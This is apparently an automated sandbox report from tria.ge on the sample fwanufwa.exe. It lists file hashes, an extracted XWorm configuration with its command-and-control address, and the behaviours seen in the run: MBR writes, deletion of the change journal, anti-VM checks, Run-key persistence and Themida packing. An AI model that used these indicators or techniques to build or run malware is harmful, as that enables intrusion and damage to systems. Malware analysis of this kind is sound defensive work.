Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
04/05/2024, 19:11
Static task
static1
Behavioral task
behavioral1
Sample
fwanufwa.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
fwanufwa.exe
Resource
win10v2004-20240419-en
General
-
Target
fwanufwa.exe
-
Size
16.7MB
-
MD5
157d1a68e8368cb8ed46e3173122562b
-
SHA1
9fda498d3101ab26afe01a630f7dfec445cbef0c
-
SHA256
aa1beca1ce33a11a5c56a8a79d03e38b51339d0fe977495ad72eb8b068b379bc
-
SHA512
94ccf7674c0f5f849cd28c04da7d4dd045107fe78ca98e62f622511c3953ef94b6f248703820b29d01713d062984b300b37d5ba1c7d2e5b15febeddcb603a83d
-
SSDEEP
393216:Aw73+t5XTNsNiI7T+PkdymUAZDtGACaeIXHZzvhh0fLD4DbTpcF13X:AQ3+t7I7TXCaeaZzv7GDAcF13
Malware Config
Extracted
xworm
94.13.152.8:25565
-
Install_directory
%AppData%
-
install_file
XClient.exe
Signatures
-
Deletes NTFS Change Journal 2 TTPs 64 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 4904 fsutil.exe 208 fsutil.exe 1808 fsutil.exe 6112 fsutil.exe 4332 fsutil.exe 5688 fsutil.exe 4308 fsutil.exe 5304 fsutil.exe 720 fsutil.exe 6076 fsutil.exe 4304 fsutil.exe 5704 fsutil.exe 324 fsutil.exe 3912 fsutil.exe 5736 fsutil.exe 6132 fsutil.exe 4012 fsutil.exe 5364 fsutil.exe 4768 fsutil.exe 5904 fsutil.exe 4316 fsutil.exe 848 fsutil.exe 696 fsutil.exe 5784 fsutil.exe 4772 fsutil.exe 2752 fsutil.exe 2928 fsutil.exe 4016 fsutil.exe 4952 fsutil.exe 5296 fsutil.exe 5688 fsutil.exe 4516 fsutil.exe 2820 fsutil.exe 4644 fsutil.exe 6068 fsutil.exe 3440 fsutil.exe 3624 fsutil.exe 3576 fsutil.exe 4504 fsutil.exe 5952 fsutil.exe 5476 fsutil.exe 6072 fsutil.exe 5752 fsutil.exe 4064 fsutil.exe 5320 fsutil.exe 5204 fsutil.exe 1820 fsutil.exe 6096 fsutil.exe 4960 fsutil.exe 5324 fsutil.exe 5316 fsutil.exe 5888 fsutil.exe 3608 fsutil.exe 4668 fsutil.exe 5284 fsutil.exe 1480 fsutil.exe 1280 fsutil.exe 5884 fsutil.exe 5468 fsutil.exe 6128 fsutil.exe 5796 fsutil.exe 5972 fsutil.exe 5656 fsutil.exe 4972 fsutil.exe -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000b000000023b93-20.dat family_xworm behavioral2/memory/3708-22-0x0000000000CD0000-0x0000000000CE6000-memory.dmp family_xworm -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5Bzkgs9t.exe -
pid Process 4540 powershell.exe 4088 powershell.exe 4244 powershell.exe 4164 powershell.exe 5808 powershell.exe 4764 powershell.exe 6028 powershell.exe 5876 powershell.exe 4936 powershell.exe 4632 powershell.exe 5072 powershell.exe 4904 powershell.exe 2420 powershell.exe 5540 powershell.exe 6064 powershell.exe 5360 powershell.exe 5752 powershell.exe 5424 powershell.exe 5560 powershell.exe 5308 powershell.exe 5840 powershell.exe 4004 powershell.exe 5292 powershell.exe 4424 powershell.exe 5508 powershell.exe 1896 powershell.exe 6004 powershell.exe 2144 powershell.exe 5112 powershell.exe 1816 powershell.exe 3844 powershell.exe 4732 powershell.exe 1872 powershell.exe 5760 powershell.exe 448 powershell.exe 720 powershell.exe 2916 powershell.exe 3872 powershell.exe 556 powershell.exe 1336 powershell.exe 3448 powershell.exe 5592 powershell.exe 4864 powershell.exe 5688 powershell.exe 456 powershell.exe 1584 powershell.exe 5700 powershell.exe 1216 powershell.exe 2248 powershell.exe 4772 powershell.exe 2820 powershell.exe 5476 powershell.exe 5252 powershell.exe 2996 powershell.exe 4724 powershell.exe 4760 powershell.exe 3468 powershell.exe 4464 powershell.exe 948 powershell.exe 5188 powershell.exe 5176 powershell.exe 1012 powershell.exe 5004 powershell.exe 4372 powershell.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\w32time\Parameters\ServiceDll = "C:\\Windows\\SYSTEM32\\w32time.DLL" w32tm.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5Bzkgs9t.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5Bzkgs9t.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation XClient.exe Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation fwanufwa.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe -
Executes dropped EXE 4 IoCs
pid Process 4552 5Bzkgs9t.exe 3708 XClient.exe 4380 XClient.exe 4088 XClient.exe -
resource yara_rule behavioral2/files/0x000e000000023b89-6.dat themida behavioral2/memory/4552-23-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-24-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-25-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-26-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-27-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-155-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-223-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-305-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-561-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-628-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-696-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-763-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-855-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-918-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-999-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-1070-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-1131-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-1201-0x0000000140000000-0x00000001428C5000-memory.dmp themida behavioral2/memory/4552-1283-0x0000000140000000-0x00000001428C5000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" XClient.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5Bzkgs9t.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: MBR2GPT.EXE File opened (read-only) \??\F: MBR2GPT.EXE File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\D: fsutil.exe File opened (read-only) \??\F: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 vds.exe File opened for modification \??\PhysicalDrive0 MBR2GPT.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\Recovery\ReAgent.xml ReAgentc.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4552 5Bzkgs9t.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\Prefetch\SVCHOST.EXE-7CFEDEA3.pf powershell.exe File opened for modification C:\Windows\INF\setupapi.dev.log vds.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-61696F68.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-6F2A95AF.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-FCAF5656.pf powershell.exe File opened for modification C:\Windows\Prefetch\SMCONFIGINSTALLER.EXE-039D5D2E.pf powershell.exe File opened for modification C:\Windows\Prefetch\SVCHOST.EXE-9F4DB6F5.pf powershell.exe File opened for modification C:\Windows\Prefetch\WFSERVICESREG.EXE-3EE82250.pf powershell.exe File opened for modification C:\Windows\diagerr.xml MBR2GPT.EXE File opened for modification C:\Windows\Prefetch\ResPriHMStaticDb.ebd powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-23EA2E5B.pf powershell.exe File opened for modification C:\Windows\Prefetch\SETTINGSYNCHOST.EXE-2521C7ED.pf powershell.exe File opened for modification C:\Windows\Prefetch\FSQUIRT.EXE-BBD9646E.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-16AF9B6E.pf powershell.exe File opened for modification C:\Windows\Prefetch\TIWORKER.EXE-C101ABCD.pf powershell.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\Prefetch\JA7KRI.EXE-6FB30C08.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-0521102C.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-E66A223C.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-32DA767E.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-AED2006F.pf powershell.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-99F89D15.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-06226CEB.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-D9106866.pf powershell.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\setupact.log MBR2GPT.EXE File opened for modification C:\Windows\Prefetch\APPLICATIONFRAMEHOST.EXE-CCEEF759.pf powershell.exe File opened for modification C:\Windows\Prefetch\BACKGROUNDTRANSFERHOST.EXE-CF5B50C1.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-56E309E9.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-4DE02988.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-BC366267.pf powershell.exe File opened for modification C:\Windows\Prefetch\VSSVC.EXE-B8AFC319.pf powershell.exe File opened for modification C:\Windows\Prefetch\ReadyBoot\rblayout.xin powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-C5BE1C43.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-DB926CB0.pf powershell.exe File opened for modification C:\Windows\Prefetch\FILESYNCCONFIG.EXE-CB60E6FA.pf powershell.exe File opened for modification C:\Windows\Prefetch\SVCHOST.EXE-F027B880.pf powershell.exe File opened for modification C:\Windows\Prefetch\ONEDRIVESETUP.EXE-8CE5A462.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-641DCE1C.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-B2C296EF.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-3ED30A86.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-94A02D86.pf powershell.exe File opened for modification C:\Windows\Prefetch\ASPNET_REGIIS.EXE-A5891C91.pf powershell.exe File opened for modification C:\Windows\Prefetch\BACKGROUNDTASKHOST.EXE-ACEF2FA2.pf powershell.exe File opened for modification C:\Windows\Prefetch\DLLHOST.EXE-504C779A.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-98C67737.pf powershell.exe File opened for modification C:\Windows\Prefetch\DLLHOST.EXE-5E46FA0D.pf powershell.exe File opened for modification C:\Windows\setuperr.log MBR2GPT.EXE File opened for modification C:\Windows\Prefetch\ReadyBoot\ReadyBoot.etl powershell.exe File opened for modification C:\Windows\Prefetch\ReadyBoot powershell.exe File opened for modification C:\Windows\Prefetch\AgGlGlobalHistory.db powershell.exe File opened for modification C:\Windows\Prefetch\SMCONFIGINSTALLER.EXE-EC979AE0.pf powershell.exe File opened for modification C:\Windows\Prefetch\WLRMDR.EXE-C2B47318.pf powershell.exe File opened for modification C:\Windows\Prefetch\ASPNET_REGIIS.EXE-945CDB73.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-156D43F1.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-7C77C512.pf powershell.exe File opened for modification C:\Windows\Prefetch\NGEN.EXE-AE594A6B.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-B1A87C0F.pf powershell.exe File opened for modification C:\Windows\Prefetch\TASKHOSTW.EXE-3E0B74C8.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-7E8D1C35.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-7F337F0A.pf powershell.exe File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-E8196656.pf powershell.exe File opened for modification C:\Windows\Prefetch\DLLHOST.EXE-28A8211F.pf powershell.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1372 sc.exe 948 sc.exe 1776 sc.exe 4724 sc.exe 2384 sc.exe 5616 sc.exe 4448 sc.exe 4460 sc.exe 3396 sc.exe 4300 sc.exe 3224 sc.exe 4736 sc.exe 2088 sc.exe 3836 sc.exe 5496 sc.exe 3944 sc.exe 1808 sc.exe 6028 sc.exe 5508 sc.exe 3792 sc.exe 5876 sc.exe 5320 sc.exe 5276 sc.exe 5504 sc.exe 1776 sc.exe 2260 sc.exe 2672 sc.exe 4452 sc.exe 5608 sc.exe 2248 sc.exe 5160 sc.exe 5328 sc.exe 5336 sc.exe 2184 sc.exe 6060 sc.exe 4652 sc.exe 3004 sc.exe 5460 sc.exe 6092 sc.exe 3220 sc.exe 5340 sc.exe 5512 sc.exe 5020 sc.exe 5152 sc.exe 1896 sc.exe 6100 sc.exe 1816 sc.exe 3468 sc.exe 4936 sc.exe 1908 sc.exe 4968 sc.exe 5844 sc.exe 5416 sc.exe 4464 sc.exe 1940 sc.exe 6092 sc.exe 3224 sc.exe 5868 sc.exe 5460 sc.exe 1880 sc.exe 4960 sc.exe 5444 sc.exe 4928 sc.exe 4428 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 25 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A vds.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\AttributesTableCache = a2a0d0ebe5b9334487c068b6b72699c70000000000000000 vds.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e45bd8429919154b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e45bd8420000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d012000000000000e0e63a000000ffffffff000000000700010000680900e45bd842000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de45bd842000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e45bd84200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vds.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e45bd8421cfceb560000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e45bd8420000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d012000000000000e0e63a000000ffffffff000000000700010000680900e45bd842000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b0f93a0000000000400600000000ffffffff000000002700010000d87c1de45bd842000000000000b0f93a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de45bd842000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vds.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vds.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ vds.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e45bd8429619152b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e45bd8420000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e45bd842000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de45bd842000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e45bd84200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e45bd8421cfc06570000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e45bd8420000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d012000000000000e0e63a000000ffffffff000000000700010000680900e45bd842000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b0f93a0000000000400600000000ffffffff000000000c00010000d87c1de45bd842000000000000b0f93a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de45bd842000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2904 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\MUICACHE 5Bzkgs9t.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4244 powershell.exe 4244 powershell.exe 1100 powershell.exe 1100 powershell.exe 2804 powershell.exe 2804 powershell.exe 2116 powershell.exe 2116 powershell.exe 436 powershell.exe 436 powershell.exe 456 powershell.exe 456 powershell.exe 4640 powershell.exe 4640 powershell.exe 2116 powershell.exe 436 powershell.exe 456 powershell.exe 4640 powershell.exe 396 powershell.exe 396 powershell.exe 396 powershell.exe 3448 powershell.exe 3448 powershell.exe 3448 powershell.exe 984 powershell.exe 984 powershell.exe 984 powershell.exe 1680 powershell.exe 1680 powershell.exe 1680 powershell.exe 3708 XClient.exe 3708 XClient.exe 3244 powershell.exe 3244 powershell.exe 3244 powershell.exe 4904 powershell.exe 4904 powershell.exe 4904 powershell.exe 2144 powershell.exe 2144 powershell.exe 2144 powershell.exe 4760 powershell.exe 4760 powershell.exe 4760 powershell.exe 1872 powershell.exe 1872 powershell.exe 1872 powershell.exe 2820 powershell.exe 2820 powershell.exe 2820 powershell.exe 1380 powershell.exe 1380 powershell.exe 1380 powershell.exe 4772 powershell.exe 4772 powershell.exe 4772 powershell.exe 4632 powershell.exe 4632 powershell.exe 4632 powershell.exe 4688 powershell.exe 4688 powershell.exe 4688 powershell.exe 948 powershell.exe 948 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 4720 vds.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 4036 msedge.exe 4036 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
